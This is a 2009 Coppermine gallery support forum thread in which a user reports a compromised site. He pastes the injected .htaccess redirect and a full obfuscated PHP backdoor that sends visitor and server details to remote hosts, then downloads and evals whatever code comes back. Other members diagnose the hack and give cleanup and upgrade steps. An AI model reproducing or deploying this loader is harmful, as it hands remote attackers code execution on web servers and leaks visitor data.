Almost all Images/Thumbs not showing ( albums flooded with .htaccess) Almost all Images/Thumbs not showing ( albums flooded with .htaccess)
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Almost all Images/Thumbs not showing ( albums flooded with .htaccess)

Started by metal13, September 09, 2009, 05:20:23 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

metal13


not sure what did it but every album directory has a htaccess file and a php file...
MY GALLERY :: 11565 files in 717 albums and 17 categories

There's no way i can delete them all... its gonna take forever to do that...
is there a way to batch delete them?
or make a main htaccess to ignore the htaccess in the directories?


my site: http://minipoy.com/media/index.php
( Warning: Adult content )

Installed plug-ins   
QuoteName Onlinestats v1.8       
Name JUpload plugin Plugin v3.5.1          
Name Stats v1.1.1
Copy /Paste BB Code image url v1.2
Search Engine Friendly URLs v1.44 <<<< is it this one???




214106.php
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=
(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=
(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=
(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=
(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=
(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_en
code($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base
64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="a4bfca0f6acea34f6f84287dcf6e4e25") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>




.htaccess
Options -MultiViews
ErrorDocument 404 //media/albums/Celebrities/A-B/AB Production/214106.php


Nibbler

You were probably hacked. See http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

If you want to learn how to use .htaccess files as you ask, read the Apache documentation.

metal13

i give up  :-\...tried my best  :-[... wasted 4 hours and all i got is a 500 server error on all pages every time...  :'( :'( :'( :'(

can someone help me please... i need an htaccess that can ignore all ".htaccess" in my albums folder... or ignore all htaccess in my server...

Nibbler... help meeeeeeeeeeeeeee................... pleeeeaaassseeee......... :'( :'( :'( :'( :'( :'( :'(

onthepike

You were definitely hacked, and by the looks of it, based upon your htaccess file, hacked into your document root. Not good.

What version were you running at the time of this hack? I see that you are currently running 1.4.24.

I don't know of an automated way to delete all the htaccess files, but you should immediately delete the non-Coppermine (numbered) php files. Then delete each htaccess file within the albums folder. Then clean your web space entirely by eliminating files and folders that shouldn't be there and updating everything you're running.

I would begin by shutting down the gallery and placing it into maintenance mode. Make a backup of your include/config.inc.php file and your database (and any other custom file you may have). Then delete everything inside the media directory, except the albums folder. Then run through the albums folder and delete everything that's not an image.

Fire up your FTP client and get to work

metal13

its all gone now... i downloaded all my albums, search and removed then in my pc....then reuploaded them again...  :'( :'( :'( hope it doesnt happen again...

metal13

its all gone now... i downloaded all my albums, search and removed them in my pc....then reuploaded them again...   :'( :'( :'( :'( hope it doesnt happen again...

onthepike

Quote from: metal13 on September 16, 2009, 04:54:53 AMHope it doesnt happen again.

Did you actually update your gallery, or simply clean out the "bad files" and re-upload?

Your version (1.4.24) is the same version it was when you posted. It should read 1.4.25 after update. Simply deleting the "bad files" isn't going to protect you. And what version of CPG were you running BEFORE you last updated, and when did you last update? And did you inspect the rest of your web space for "bad files" as well?

Did you perform all steps here: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

If you didn't, you'll be back here again.